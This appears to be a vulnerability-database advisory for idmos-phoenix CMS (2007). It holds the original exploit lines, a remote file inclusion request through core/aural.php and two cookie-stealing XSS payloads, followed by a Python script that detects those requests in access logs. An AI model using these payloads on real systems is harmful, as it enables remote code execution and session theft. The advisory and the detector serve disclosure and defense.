Vendor: CMS
By: HACKERS PAL
CVSS: 5.5 (MEDIUM)
Remote File Inclusion
CWE: 98
Product Name: CMS
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

idmos-phoenix CMS Remote File Inclusion

This vulnerability allows an attacker to include remote files on the server. In the proof of concept, the site_absolute_path parameter of core/aural.php is pointed at a 'cmd.txt' file on localhost, and the included file executes the 'dir' command.

Mitigation:

The vulnerability can be mitigated by properly sanitizing user input and using secure coding practices to prevent remote file inclusion attacks.

Exploit-DB raw data:

idmos-phoenix cms Remote File inclusion
 
Discovered By : HACKERS PAL
Copyright : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net
 
RFI
core/aural.php?site_absolute_path=http://localhost/cmd.txt?&cmd=dir
 
XSS
error.php?err_msg=<script>alert(document.cookie);</script>
templates/simple/ia.php?content=<script>alert(document.cookie);</script>
# WwW.SoQoR.NeT

# milw0rm.com [2007-10-07]
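
A log check for the request patterns listed above, as an added example that is not part of the original advisory or the CMS code: it flags a URL scheme in site_absolute_path and HTML tags in err_msg or content, including double-encoded values. The access-log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script path suffix -> parameters named in the advisory's proof-of-concept requests.
RFI_PARAMS = {"core/aural.php": {"site_absolute_path"}}
XSS_PARAMS = {"error.php": {"err_msg"}, "templates/simple/ia.php": {"content"}}
# A path parameter must not start with a URL scheme (2+ chars, so drive letters pass).
SCHEME_RE = re.compile(r"^\s*[a-z][a-z0-9+.\-]+:", re.I)
# An opening or closing HTML tag inside a value that the page echoes back.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z!]", re.I)
# Request target from a common/combined-format access log line (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def _watched(path, table):
    """Parameters to inspect for this script path, or an empty set."""
    return next((names for sfx, names in table.items() if path.endswith("/" + sfx)), set())


def classify(log_line):
    """Return sorted findings such as 'rfi:site_absolute_path' for one log line."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    target = urlsplit(match.group(1))
    rfi, xss = _watched(target.path, RFI_PARAMS), _watched(target.path, XSS_PARAMS)
    findings = set()
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        value = unquote(value)  # parse_qsl decoded once; this catches double encoding
        if name in rfi and SCHEME_RE.search(value):
            findings.add("rfi:" + name)
        if name in xss and MARKUP_RE.search(value):
            findings.add("xss:" + name)
    return sorted(findings)


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Oct/2007:10:00:01 +0000] "GET /cms/core/aural.php?site_absolute_path=http://localhost/cmd.txt?&cmd=dir HTTP/1.1" 200 512',
    '192.0.2.11 - - [07/Oct/2007:10:00:05 +0000] "GET /cms/error.php?err_msg=%3Cscript%3Ealert(document.cookie);%3C/script%3E HTTP/1.1" 200 301',
    '192.0.2.12 - - [07/Oct/2007:10:00:09 +0000] "GET /cms/templates/simple/ia.php?content=%253Cscript%253Ealert(1)%253C/script%253E HTTP/1.1" 200 290',
    '192.0.2.13 - - [07/Oct/2007:10:00:12 +0000] "GET /cms/error.php?err_msg=Page+not+found HTTP/1.1" 200 120',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line) or "clean", "<-", line.split('"')[1])
```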